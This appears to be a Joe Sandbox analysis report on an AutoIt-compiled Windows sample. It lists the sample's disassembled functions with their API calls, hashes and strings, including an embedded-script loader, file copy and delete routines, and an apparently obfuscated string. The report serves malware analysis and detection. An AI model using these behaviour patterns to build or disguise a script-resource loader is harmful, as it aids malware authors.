                                                                                  • GetSystemInfo.KERNEL32(?,0058DC38,?,?), ref: 0050DF29
                                                                                  • GetSystemInfo.KERNEL32(?,0058DC38,?,?), ref: 0050DF35
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                                  • String ID:
                                                                                  • API String ID: 3851250370-0
                                                                                  • Opcode ID: a04f615bb0916a307c2392f4d42e39a1fb98a230623f63f8bcc19ae996014c9f
                                                                                  • Instruction ID: c6636218cf7bc156d9c43fcfb3c8458604e6b629492fd861188605ddb12e5b0d
                                                                                  • Opcode Fuzzy Hash: a04f615bb0916a307c2392f4d42e39a1fb98a230623f63f8bcc19ae996014c9f
                                                                                  • Instruction Fuzzy Hash: 296180B180A384DBCF15CFA898C15EDBFB47F29300F1989D9D8499F247D624C949CB69
                                                                                  Function 004F406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1147 4f406b-4f4083 CreateStreamOnHGlobal 1148 4f4085-4f409c FindResourceExW 1147->1148 1149 4f40a3-4f40a6 1147->1149 1150 564f16-564f25 LoadResource 1148->1150 1151 4f40a2 1148->1151 1150->1151 1152 564f2b-564f39 SizeofResource 1150->1152 1151->1149 1152->1151 1153 564f3f-564f4a LockResource 1152->1153 1153->1151 1154 564f50-564f58 1153->1154 1155 564f5c-564f6e 1154->1155 1155->1151
                                                                                  APIs
                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,004F449E,?,?,00000000,00000001), ref: 004F407B
                                                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,004F449E,?,?,00000000,00000001), ref: 004F4092
                                                                                  • LoadResource.KERNEL32(?,00000000,?,?,004F449E,?,?,00000000,00000001,?,?,?,?,?,?,004F41FB), ref: 00564F1A
                                                                                  • SizeofResource.KERNEL32(?,00000000,?,?,004F449E,?,?,00000000,00000001,?,?,?,?,?,?,004F41FB), ref: 00564F2F
                                                                                  • LockResource.KERNEL32(004F449E,?,?,004F449E,?,?,00000000,00000001,?,?,?,?,?,?,004F41FB,00000000), ref: 00564F42
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                  • String ID: SCRIPT
                                                                                  • API String ID: 3051347437-3967369404
                                                                                  • Opcode ID: 96797d384f1e64d7e053a16656059b0924e4197b6b436e798cd27f033075105f
                                                                                  • Instruction ID: 430a52cfe9f85f19290f38909a95a533072e64d857adac193ca2c39553ba8bd8
                                                                                  • Opcode Fuzzy Hash: 96797d384f1e64d7e053a16656059b0924e4197b6b436e798cd27f033075105f
                                                                                  • Instruction Fuzzy Hash: 93115774200705AFEB218B25EC48F277BB9EFC5B51F20812DF606962A0DF75EC45AA31
                                                                                  Function 00536CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNELBASE(?,00562F49), ref: 00536CB9
                                                                                  • FindFirstFileW.KERNELBASE(?,?), ref: 00536CCA
                                                                                  • FindClose.KERNEL32(00000000), ref: 00536CDA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFind$AttributesCloseFirst
                                                                                  • String ID:
                                                                                  • API String ID: 48322524-0
                                                                                  • Opcode ID: 177fb551c7920ec7596a9433f194f529c2d8ca112a9b71ed4bbf872bb4b00d71
                                                                                  • Instruction ID: 15cec0b9cb397ba82952918d8575fcf410ac45313eff4e418d90992779730e66
                                                                                  • Opcode Fuzzy Hash: 177fb551c7920ec7596a9433f194f529c2d8ca112a9b71ed4bbf872bb4b00d71
                                                                                  • Instruction Fuzzy Hash: 77E012718155156782106738AC098E97B7CEE1533AF504719F575C21D0E760DD44A5A5
                                                                                  Function 00503200 Relevance: 2.2, Strings: 1, Instructions: 986COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharUpper
                                                                                  • String ID: [
                                                                                  • API String ID: 3964851224-2366388290
                                                                                  • Opcode ID: a5252afabd837f793dbe1081eec4bb311907d936d5514cf8c983b0dd0f5b4ac2
                                                                                  • Instruction ID: 91b41ff66dbfd0a0898a80fbc39528730fc69b38dc72a80ff3aa8f846ec9756c
                                                                                  • Opcode Fuzzy Hash: a5252afabd837f793dbe1081eec4bb311907d936d5514cf8c983b0dd0f5b4ac2
                                                                                  • Instruction Fuzzy Hash: 3C927A706083419FD724DF18C484B6ABBE9BF88308F14885DE99A8B3A2D775ED45CB52
                                                                                  Function 004FE8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004FE959
                                                                                  • timeGetTime.WINMM ref: 004FEBFA
                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004FED2E
                                                                                  • TranslateMessage.USER32(?), ref: 004FED3F
                                                                                  • DispatchMessageW.USER32(?), ref: 004FED4A
                                                                                  • LockWindowUpdate.USER32(00000000), ref: 004FED79
                                                                                  • DestroyWindow.USER32 ref: 004FED85
                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004FED9F
                                                                                  • Sleep.KERNEL32(0000000A), ref: 00565270
                                                                                  • TranslateMessage.USER32(?), ref: 005659F7
                                                                                  • DispatchMessageW.USER32(?), ref: 00565A05
                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00565A19
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                  • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                  • API String ID: 2641332412-570651680
                                                                                  • Opcode ID: 2b5b1e2f8880e2181079341187ee9634070c7c406de2c4f95502b288bebdcbeb
                                                                                  • Instruction ID: 633fe391c0ee1b3cdf9a14d58a5b7e769070d5543b08277da6ac0e9d75ddb236
                                                                                  • Opcode Fuzzy Hash: 2b5b1e2f8880e2181079341187ee9634070c7c406de2c4f95502b288bebdcbeb
                                                                                  • Instruction Fuzzy Hash: EC62F870504345DFDB20DF25C895BBA7BE4BF54304F14096EFA468B2A2DB74E848CB66
                                                                                  Function 00525C78 Relevance: 49.6, APIs: 26, Strings: 2, Instructions: 626fileCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___createFile.LIBCMT ref: 00525EC3
                                                                                  • ___createFile.LIBCMT ref: 00525F04
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00525F2D
                                                                                  • __dosmaperr.LIBCMT ref: 00525F34
                                                                                  • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00525F47
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00525F6A
                                                                                  • __dosmaperr.LIBCMT ref: 00525F73
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00525F7C
                                                                                  • __set_osfhnd.LIBCMT ref: 00525FAC
                                                                                  • __lseeki64_nolock.LIBCMT ref: 00526016
                                                                                  • __close_nolock.LIBCMT ref: 0052603C
                                                                                  • __chsize_nolock.LIBCMT ref: 0052606C
                                                                                  • __lseeki64_nolock.LIBCMT ref: 0052607E
                                                                                  • __lseeki64_nolock.LIBCMT ref: 00526176
                                                                                  • __lseeki64_nolock.LIBCMT ref: 0052618B
                                                                                  • __close_nolock.LIBCMT ref: 005261EB
                                                                                    • Part of subcall function 0051EA9C: CloseHandle.KERNELBASE(00000000,0059EEF4,00000000,?,00526041,0059EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0051EAEC
                                                                                    • Part of subcall function 0051EA9C: GetLastError.KERNEL32(?,00526041,0059EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0051EAF6
                                                                                    • Part of subcall function 0051EA9C: __free_osfhnd.LIBCMT ref: 0051EB03
                                                                                    • Part of subcall function 0051EA9C: __dosmaperr.LIBCMT ref: 0051EB25
                                                                                    • Part of subcall function 00517C0E: __getptd_noexit.LIBCMT ref: 00517C0E
                                                                                  • __lseeki64_nolock.LIBCMT ref: 0052620D
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00526342
                                                                                  • ___createFile.LIBCMT ref: 00526361
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0052636E
                                                                                  • __dosmaperr.LIBCMT ref: 00526375
                                                                                  • __free_osfhnd.LIBCMT ref: 00526395
                                                                                  • __invoke_watson.LIBCMT ref: 005263C3
                                                                                  • __wsopen_helper.LIBCMT ref: 005263DD
                                                                                  Strings
                                                                                  • vv9aqg50vv9aqg50vv9aqg50vv9aqg50vv9aqg56vv9aqg56vv9aqg58vv9aqg59vv9aqg54vv9aqg55vv9aqg5evv9aqg50vv9aqg5bvv9aqg59vv9aqg56vv9aqg55vv, xrefs: 00525E31
                                                                                  • @, xrefs: 00525F98
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                  • String ID: @$vv9aqg50vv9aqg50vv9aqg50vv9aqg50vv9aqg56vv9aqg56vv9aqg58vv9aqg59vv9aqg54vv9aqg55vv9aqg5evv9aqg50vv9aqg5bvv9aqg59vv9aqg56vv9aqg55vv
                                                                                  • API String ID: 3896587723-2129363465
                                                                                  • Opcode ID: 61e262346ef896f09f8b780762d2d8adb6786a54b62f00b93b8481096666c415
                                                                                  • Instruction ID: 5aaeae16c87c9eb4b8c6006543faf02c66309c7c35e023a8fb403efd1b146060
                                                                                  • Opcode Fuzzy Hash: 61e262346ef896f09f8b780762d2d8adb6786a54b62f00b93b8481096666c415
                                                                                  • Instruction Fuzzy Hash: B122567190062A9FEB298F68EC497ED7F31FF16314F244628E9119B2D1E2358E90DB91
                                                                                  Function 0053FA0C Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 238COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • _wcscpy.LIBCMT ref: 0053FA96
                                                                                  • _wcschr.LIBCMT ref: 0053FAA4
                                                                                  • _wcscpy.LIBCMT ref: 0053FABB
                                                                                  • _wcscat.LIBCMT ref: 0053FACA
                                                                                  • _wcscat.LIBCMT ref: 0053FAE8
                                                                                  • _wcscpy.LIBCMT ref: 0053FB09
                                                                                  • __wsplitpath.LIBCMT ref: 0053FBE6
                                                                                  • _wcscpy.LIBCMT ref: 0053FC0B
                                                                                  • _wcscpy.LIBCMT ref: 0053FC1D
                                                                                  • _wcscpy.LIBCMT ref: 0053FC32
                                                                                  • _wcscat.LIBCMT ref: 0053FC47
                                                                                  • _wcscat.LIBCMT ref: 0053FC59
                                                                                  • _wcscat.LIBCMT ref: 0053FC6E
                                                                                    • Part of subcall function 0053BFA4: _wcscmp.LIBCMT ref: 0053C03E
                                                                                    • Part of subcall function 0053BFA4: __wsplitpath.LIBCMT ref: 0053C083
                                                                                    • Part of subcall function 0053BFA4: _wcscpy.LIBCMT ref: 0053C096
                                                                                    • Part of subcall function 0053BFA4: _wcscat.LIBCMT ref: 0053C0A9
                                                                                    • Part of subcall function 0053BFA4: __wsplitpath.LIBCMT ref: 0053C0CE
                                                                                    • Part of subcall function 0053BFA4: _wcscat.LIBCMT ref: 0053C0E4
                                                                                    • Part of subcall function 0053BFA4: _wcscat.LIBCMT ref: 0053C0F7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                  • String ID: >>>AUTOIT SCRIPT<<<$t2Z
                                                                                  • API String ID: 2955681530-131526147
                                                                                  • Opcode ID: e67f62d968fb52d315a2742562446a6e04fe91f26ebce46283308fc03bd7c018
                                                                                  • Instruction ID: 9215ef8cda82d5c0e18360ce73c2e83c3dfe73b0cbfe4d64b0395d0decda531d
                                                                                  • Opcode Fuzzy Hash: e67f62d968fb52d315a2742562446a6e04fe91f26ebce46283308fc03bd7c018
                                                                                  • Instruction Fuzzy Hash: 7B919172504306AFDB20EB54C855F9EB7E8BF88314F00486DF95997291DB34EE84CB96
                                                                                  Function 004F3F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 004F3F86
                                                                                  • RegisterClassExW.USER32(00000030), ref: 004F3FB0
                                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004F3FC1
                                                                                  • InitCommonControlsEx.COMCTL32(?), ref: 004F3FDE
                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004F3FEE
                                                                                  • LoadIconW.USER32(000000A9), ref: 004F4004
                                                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 004F4013
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                  • API String ID: 2914291525-1005189915
                                                                                  • Opcode ID: 01f67d8e60582d42ab15c8645f0b179039d5f481a3cf7b90911a36563df7ea54
                                                                                  • Instruction ID: 73e41eb5ea956e0c29d78cb9f4baae1eb7b201c53ae12f693ab6b30e63214348
                                                                                  • Opcode Fuzzy Hash: 01f67d8e60582d42ab15c8645f0b179039d5f481a3cf7b90911a36563df7ea54
                                                                                  • Instruction Fuzzy Hash: 6421F9B5D00318AFDB80DFA4EC89BCDBBB4FB18700F10421AF515A62A0D7B51588EFA5
                                                                                  Function 0053BFA4 Relevance: 18.3, APIs: 12, Instructions: 316fileCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 0053BDB4: __time64.LIBCMT ref: 0053BDBE
                                                                                    • Part of subcall function 004F4517: _fseek.LIBCMT ref: 004F452F
                                                                                  • __wsplitpath.LIBCMT ref: 0053C083
                                                                                    • Part of subcall function 00511DFC: __wsplitpath_helper.LIBCMT ref: 00511E3C
                                                                                  • _wcscpy.LIBCMT ref: 0053C096
                                                                                  • _wcscat.LIBCMT ref: 0053C0A9
                                                                                  • __wsplitpath.LIBCMT ref: 0053C0CE
                                                                                  • _wcscat.LIBCMT ref: 0053C0E4
                                                                                  • _wcscat.LIBCMT ref: 0053C0F7
                                                                                  • _wcscmp.LIBCMT ref: 0053C03E
                                                                                    • Part of subcall function 0053C56D: _wcscmp.LIBCMT ref: 0053C65D
                                                                                    • Part of subcall function 0053C56D: _wcscmp.LIBCMT ref: 0053C670
                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0053C2A1
                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0053C338
                                                                                  • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0053C34E
                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0053C35F
                                                                                  • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0053C371
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                  • String ID:
                                                                                  • API String ID: 2378138488-0
                                                                                  • Opcode ID: 83ebe1e6868fbfa9892e07f89bbafd8be9c031f29a0570c7f0eb9bef75b83d45
                                                                                  • Instruction ID: 893fd5d6f8ad97f83422176bd7ee0205fc1984db6c6ec968b8b63bb38d350278
                                                                                  • Opcode Fuzzy Hash: 83ebe1e6868fbfa9892e07f89bbafd8be9c031f29a0570c7f0eb9bef75b83d45
                                                                                  • Instruction Fuzzy Hash: EFC12AB1900219ABDF11DF95CC85EEEBBB9BF89304F0040AAF609F7151DB749A848F65
                                                                                  Function 004F3742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 957 4f3742-4f3762 959 4f3764-4f3767 957->959 960 4f37c2-4f37c4 957->960 962 4f3769-4f3770 959->962 963 4f37c8 959->963 960->959 961 4f37c6 960->961 964 4f37ab-4f37b3 DefWindowProcW 961->964 967 4f382c-4f3834 PostQuitMessage 962->967 968 4f3776-4f377b 962->968 965 4f37ce-4f37d1 963->965 966 561e00-561e2e call 4f2ff6 call 50e312 963->966 972 4f37b9-4f37bf 964->972 973 4f37f6-4f381d SetTimer RegisterWindowMessageW 965->973 974 4f37d3-4f37d4 965->974 1000 561e33-561e3a 966->1000 971 4f37f2-4f37f4 967->971 969 561e88-561e9c call 534ddd 968->969 970 4f3781-4f3783 968->970 969->971 994 561ea2 969->994 977 4f3789-4f378e 970->977 978 4f3836-4f3840 call 50eb83 970->978 971->972 973->971 979 4f381f-4f382a CreatePopupMenu 973->979 981 561da3-561da6 974->981 982 4f37da-4f37ed KillTimer call 4f3847 call 4f390f 974->982 984 561e6d-561e74 977->984 985 4f3794-4f3799 977->985 995 4f3845 978->995 979->971 988 561ddc-561dfb MoveWindow 981->988 989 561da8-561daa 981->989 982->971 984->964 999 561e7a-561e83 call 52a5f3 984->999 992 4f379f-4f37a5 985->992 993 561e58-561e68 call 5355bd 985->993 988->971 996 561dac-561daf 989->996 997 561dcb-561dd7 SetFocus 989->997 992->964 992->1000 993->971 994->964 995->971 996->992 1001 561db5-561dc6 call 4f2ff6 996->1001 997->971 999->964 1000->964 1006 561e40-561e53 call 4f3847 call 4f4ffc 1000->1006 1001->971 1006->964
                                                                                  APIs
                                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 004F37B3
                                                                                  • KillTimer.USER32(?,00000001), ref: 004F37DD
                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004F3800
                                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004F380B
                                                                                  • CreatePopupMenu.USER32 ref: 004F381F
                                                                                  • PostQuitMessage.USER32(00000000), ref: 004F382E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                  • String ID: TaskbarCreated
                                                                                  • API String ID: 129472671-2362178303
                                                                                  • Opcode ID: fb13f75440745a25c7ec86495e1d6f92cd35d60c4dfdee2faf954da0db1a33d8
                                                                                  • Instruction ID: 292d13c91e38bad883299797e587bcb96969bbaced14b4f73cd8987b4e2dac4a
                                                                                  • Opcode Fuzzy Hash: fb13f75440745a25c7ec86495e1d6f92cd35d60c4dfdee2faf954da0db1a33d8
                                                                                  • Instruction Fuzzy Hash: CC4158F510054EA7DB507F38EC4EBBA3EE9FB10342F544216FB01921A0CA68AD44A77E
                                                                                  Function 004F3E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 004F3E79
                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004F3E88
                                                                                  • LoadIconW.USER32(00000063), ref: 004F3E9E
                                                                                  • LoadIconW.USER32(000000A4), ref: 004F3EB0
                                                                                  • LoadIconW.USER32(000000A2), ref: 004F3EC2
                                                                                    • Part of subcall function 004F4024: LoadImageW.USER32(004F0000,00000063,00000001,00000010,00000010,00000000), ref: 004F4048
                                                                                  • RegisterClassExW.USER32(?), ref: 004F3F30
                                                                                    • Part of subcall function 004F3F53: GetSysColorBrush.USER32(0000000F), ref: 004F3F86
                                                                                    • Part of subcall function 004F3F53: RegisterClassExW.USER32(00000030), ref: 004F3FB0
                                                                                    • Part of subcall function 004F3F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004F3FC1
                                                                                    • Part of subcall function 004F3F53: InitCommonControlsEx.COMCTL32(?), ref: 004F3FDE
                                                                                    • Part of subcall function 004F3F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004F3FEE
                                                                                    • Part of subcall function 004F3F53: LoadIconW.USER32(000000A9), ref: 004F4004
